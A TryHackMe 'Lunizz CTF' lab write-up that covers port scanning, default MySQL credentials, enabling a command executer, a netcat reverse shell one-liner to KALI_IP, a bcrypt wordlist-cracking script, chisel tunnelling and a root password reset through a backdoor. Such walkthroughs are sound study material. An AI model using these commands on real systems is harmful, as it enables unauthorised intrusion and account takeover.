Lunizz CTF - TryHackMe

lunizz CTF

This is a write-up for another of TryHackMe's rooms, named “Lunizz CTF”. The room is available here:

As always, let's start our enumeration process to find out which services are running on the target.



# Identify the list of services running on the target machine
⇒ sudo nmap -sS -Pn -T4 -p-

└─$ sudo nmap -sS -Pn -T4 -p-
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( ) at 2021-02-24 16:34 EST
Nmap scan report for
Host is up (0.024s latency).
Not shown: 65530 closed ports
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
4444/tcp open krb524
5000/tcp open upnp
Nmap done: 1 IP address (1 host up) scanned in 13.41 seconds

# Perform further information gathering on the open ports identified above
⇒ sudo nmap -O -A -Pn -T4 -p22,80,3306,4444,5000

└─$ sudo nmap -O -A -Pn -T4 -p22,80,3306,4444,5000
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( ) at 2021-02-24 16:38 EST
Nmap scan report for
Host is up (0.056s latency).
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f8:08:db:be:ed:80:d1:ef:a4:b0:a9:e8:2d:e2:dc:ee (RSA)
| 256 79:01:d6:df:8b:0a:6e:ad:b7:d8:59:9a:94:0a:09:7a (ECDSA)
|_ 256 b1:a9:ef:bb:7e:5b:01:cd:4c:8e:6b:bf:56:5d:a7:f4 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3306/tcp open mysql MySQL 5.7.32-0ubuntu0.18.04.1
| mysql-info:
| Protocol: 10
| Version: 5.7.32-0ubuntu0.18.04.1
| Thread ID: 4
| Capabilities flags: 65535
| Some Capabilities: ODBCClient, Support41Auth, Speaks41ProtocolOld, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, LongPassword, SupportsTransactions, LongColumnFlag, IgnoreSigpipes, SwitchToSSLAfterHandshake, SupportsCompression, FoundRows, InteractiveClient, Speaks41ProtocolNew, SupportsLoadDataLocal, DontAllowDatabaseTableColumn, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
| Status: Autocommit
| Salt: iM\x08P=\x1A "M}K^\x16jnU\x1Cv\x10]
|_ Auth Plugin Name: mysql_native_password
| ssl-cert: Subject: commonName=MySQL_Server_5.7.32_Auto_Generated_Server_Certificate
| Not valid before: 2020-12-10T19:29:01
|_Not valid after: 2030-12-08T19:29:01
|_ssl-date: TLS randomness does not represent time
4444/tcp open krb524?
| fingerprint-strings:
| GetRequest:
| Can you decode this for me?
| cmFuZG9tcGFzc3dvcmQ=
| Wrong Password
| Can you decode this for me?
| cmFuZG9tcGFzc3dvcmQ=
| SSLSessionReq:
| Can you decode this for me?
|_ ZXh0cmVtZXNlY3VyZXJvb3RwYXNzd29yZA==
5000/tcp open upnp?
| fingerprint-strings:
| DNSStatusRequestTCP, FourOhFourRequest, GenericLines, Kerberos, LDAPSearchReq, NULL, NotesRPC, RPCCheck, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe, giop, oracle-tns:
| OpenSSH 5.1
|_ Unable to load config info from /usr/local/ssl/openssl.cnf
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at :
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%), Linux 3.2 - 4.9 (92%), Linux 3.5 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
1 22.04 ms
2 22.81 ms
OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 16.42 seconds

The SSH version on port 22 is stable and has no known vulnerabilities. Port 80 has a web server, which we will explore further in the next section. MySQL is running on port 3306. Port 4444 exposes two base64-encoded passwords, which may be useful later on. Port 5000 appears to be running OpenSSH 5.1, a very old SSH version; we will explore it later.

Directory Brute Forcing with FFUF

We saw that port 80 is open, so let's brute force the directories and files exposed by this web server using ffuf:

ffuf -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .html,.php,.txt -c

└─$ ffuf -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .html,.php,.txt -c
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
:: Method : GET
:: URL :
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Extensions : .html .php .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
index.php [Status: 200, Size: 10917, Words: 3499, Lines: 375]
instructions.txt [Status: 200, Size: 338, Words: 39, Lines: 13]
hidden [Status: 301, Size: 313, Words: 20, Lines: 10]
whatever [Status: 301, Size: 315, Words: 20, Lines: 10]
.html [Status: 403, Size: 277, Words: 20, Lines: 10]
[Status: 200, Size: 10917, Words: 3499, Lines: 375]
.php [Status: 403, Size: 277, Words: 20, Lines: 10]
server-status [Status: 403, Size: 277, Words: 20, Lines: 10]
:: Progress: [882184/882184] :: Job [1/1] :: 475 req/sec :: Duration: [0:18:17] :: Errors: 0 ::

We saw a few interesting results above. The “whatever” directory looks interesting, as it indicates that we can run commands on the server, but the mode appears to be disabled:

cmd executer mode 0

What is the default password for mysql?

From the ffuf scan we saw a file named “instructions.txt”, so let's open it in a browser:


As we can see, we found a MySQL user and its corresponding default password. Let's connect to the database using this user and password:

mysql -u runcheck -h -p

connect database using mysql

And yes, we can connect to the database. Let's explore it by running the following commands:

MySQL [(none)]> show databases;
| Database |
| information_schema |
| runornot |
2 rows in set (0.019 sec)
MySQL [(none)]> use runornot;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [runornot]> show tables;
| Tables_in_runornot |
| runcheck |
1 row in set (0.019 sec)
MySQL [runornot]> select * from runcheck;
| 0 |
1 row in set (0.028 sec)
MySQL [runornot]>

I can’t run commands, there must be a mysql column that controls command executer:

From the table “runcheck” we were able to find the name of the column that appears to control the command executer, as its value is currently 0. We can update this value to 1 and check whether we can execute something.

MySQL [runornot]> UPDATE runcheck SET [REDACTED] = 1;
Query OK, 1 row affected (0.030 sec)
Rows matched: 1 Changed: 1 Warnings: 0
MySQL [runornot]> select * from runcheck;
| 1 |
1 row in set (0.018 sec)
MySQL [runornot]>

Now that the column's value is updated, let's check whether we can execute commands:

cmd executer mode 1

Indeed we can!

a folder shouldn’t be…

Let's execute “ls -lrt /” and we will get the answer to the above question.

Reverse Shell

From the command executer we can also get a reverse shell. Execute the following from the executer after starting a netcat listener on your Kali/attacker machine:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc KALI_IP 9999 >/tmp/f

Yes, we got the shell:

reverse shell

Upgrade Shell

Upgrade and stabilize the shell which we got by running the following commands:

/usr/bin/script -qc /bin/bash /dev/null
# press Ctrl+Z to background the shell, then on the attacker machine:
stty raw -echo
export TERM=xterm

Privilege Escalation

Transfer LinPEAS on to the target and run it. We can see that something is running on internal port 8080:


We also found a directory, /var/backups/.scripts, that explains what is running on ports 4444 and 5000; both turn out to be rabbit holes.


Exploring the directory /proct, which we found earlier and which LinPEAS also highlighted, we found a Python file with the following code:

www-data@lunizz:/$ cat /proct/pass/ 
import bcrypt
import base64
# the actual password value was removed from this listing
password = #
bpass = password.encode('ascii')
# str() of a bytes object yields the text "b'...'" (quotes included); that text, not the raw password, is what gets hashed
passed= str(base64.b64encode(bpass))
hashAndSalt = bcrypt.hashpw(passed.encode(), bcrypt.gensalt())
# despite its name, this value is a complete bcrypt hash (cost factor 12), of which the salt is only the first part
salt = b'$2b$12$SVInH5XmuS3C7eQkmqa6UOM6sDIuumJPrvuiTr.Lbz3GCcUqdf.z6'
# I wrote this code last year and i didnt save password verify line... I need to find my password

The YouTube link hints that the password can be found in the rockyou.txt word list, and the code above shows that the hash is a bcrypt hash. So let's try to crack it with John the Ripper:

john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

where hash.txt contains the hash. This did not crack the password: the script does not hash the raw password but str(base64.b64encode(password)), so none of John's candidates can match.

We will use the code above to write a Python script that takes each password from rockyou.txt, applies the same base64 encoding and bcrypt hashing with the same salt, and compares the result with the given hash. (The variable confusingly named “salt” in the script actually holds the full bcrypt hash, of which the salt is only the first part.)

This takes a long time, and it fails for some passwords in rockyou.txt because they contain special characters that the script's encode call cannot handle. One workaround is to remove those passwords from the list as you encounter them, along with the passwords that have already been tested.


Following the Python docs, a better option is to add the ignore error handler (errors='ignore') to the encode call on line 10 of the script above. This handles the special characters automatically, so there is no need to modify rockyou.txt.
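The following is an added example, not the original write-up's script and not code from the room. It reproduces the target script's transformation exactly, reads a wordlist leniently (dropping bytes that are not valid ASCII/UTF-8, as the ignore handler does), and checks each entry against a bcrypt hash. The secret, the wordlist entries and the cost factor of 4 are all constructed here so that the demo runs offline in a second; the real hash on the box uses cost 12, as its $2b$12$ prefix shows. It also shows why John's run found nothing: the stored hash covers the text b'…' produced by str(base64.b64encode(...)), quotes included, not the raw password.

```python
import base64
from typing import List, Optional

try:
    import bcrypt  # third-party package (pip install bcrypt), the same one the target script imports
except ImportError:
    bcrypt = None


def target_transform(password: str) -> bytes:
    """Reproduce exactly what the target script feeds to bcrypt.hashpw().

    The script does str(base64.b64encode(password.encode('ascii'))), so the value
    hashed is the repr of a bytes object, e.g. "b'aGVsbG8='" with the b and the
    quotes, not the raw password and not even its plain base64. Non-ASCII
    characters are dropped here (errors='ignore'), which is the fix the
    write-up applies so that rockyou.txt entries no longer abort the loop.
    """
    bpass = password.encode("ascii", errors="ignore")
    passed = str(base64.b64encode(bpass))
    return passed.encode()


def build_demo_hash(secret: str, rounds: int = 4) -> bytes:
    """Hash a constructed secret the way the target script does.

    rounds=4 keeps the demo fast; the real hash uses cost 12 ($2b$12$...).
    """
    return bcrypt.hashpw(target_transform(secret), bcrypt.gensalt(rounds=rounds))


def find_matching_entry(stored_hash: bytes, wordlist: List[bytes]) -> Optional[str]:
    """Return the wordlist entry whose transformed form matches the stored hash, or None.

    bcrypt.checkpw() extracts the salt and cost from the stored hash itself, which is
    why the script's "salt" variable (really the full hash) is all that is needed.
    """
    for raw in wordlist:
        # rockyou.txt is not valid UTF-8 throughout: decode leniently instead of raising
        candidate = raw.decode("utf-8", errors="ignore").rstrip("\r\n")
        if bcrypt.checkpw(target_transform(candidate), stored_hash):
            return candidate
    return None


def matches_raw_and_transformed(stored_hash: bytes, password: str) -> tuple:
    """(raw_matches, transformed_matches): an off-the-shelf cracker tests the first form only."""
    raw = bcrypt.checkpw(password.encode("utf-8", errors="ignore"), stored_hash)
    transformed = bcrypt.checkpw(target_transform(password), stored_hash)
    return raw, transformed


# Constructed wordlist standing in for rockyou.txt; b"caf\xe9\n" is deliberately not valid UTF-8.
CONSTRUCTED_WORDLIST = [b"123456\n", b"password\n", b"caf\xe9\n", b"letmein\n", b"iloveyou\n"]

if __name__ == "__main__":
    demo_hash = build_demo_hash("letmein")  # "letmein" is a constructed secret, not the room's password
    print("stored hash:", demo_hash.decode())
    print("raw / transformed match for the right word:", matches_raw_and_transformed(demo_hash, "letmein"))
    print("recovered entry:", find_matching_entry(demo_hash, CONSTRUCTED_WORDLIST))
```

The practical lesson for anyone writing authentication code is the mirror image of the write-up's frustration: wrapping a password in a home-made transformation before bcrypt does not make the hash stronger, it only makes the hash incompatible with every standard tool, including the developer's own future verification code (which is exactly how the file's author lost access to it).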

hi adam, do you remember our place?

Now switch user to “adam” using this password, as the file in “/proct/pass/” was owned by the user “adam”. Exploring the home directory, you will find the file that contains the password for mason:

adam@lunizz:~$ cat /home/adam/Desktop/.archive/to_my_best_friend_adam.txt 
do you remember our place
i love there it's soo calming
i will make that lights my password

Open the link and it will reveal the password.


Now switch user to “mason” with this newly found password, and we find user.txt in mason's home directory:


We saw with LinPEAS that something is running on internal port 6666. We can set up port forwarding to our Kali machine and access this internal port. We will use chisel for the port forwarding:

On Kali run chisel as server:

./chisel server -p 9000 --reverse -v

chisel as server

On Target run chisel as a client:

./chisel client R:

chisel as client

Here chisel, running as a client, connects to the server (chisel running on the Kali machine on port 9000) and ‘R’everse-forwards traffic from port 8080 on the Kali machine ( in my case) to internal port 8080 on the target machine.

Accessing the forwarded port on the Kali machine, we get Mason's Root Backdoor:

Mason’s Root Backdoor

Intercept this request in Burp and you will notice that the request/response is sent to the server using PHP; from the above, we need to send a request with a password and a command type to access the backdoor. Taking an example from here, a request can be sent to the target like this:

Let's send the request using PHP from the command line with the above script:

So we need to use Mason's password and send the request again with the cmd type lsla:

This worked, and the contents are the file listing of the root directory. Now send the request with passwd as the command type:

This changed the root user's password. Let's switch user to root using this new password:

This also worked, and we find the root flag at /root/root.txt.

That’s it.




Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900
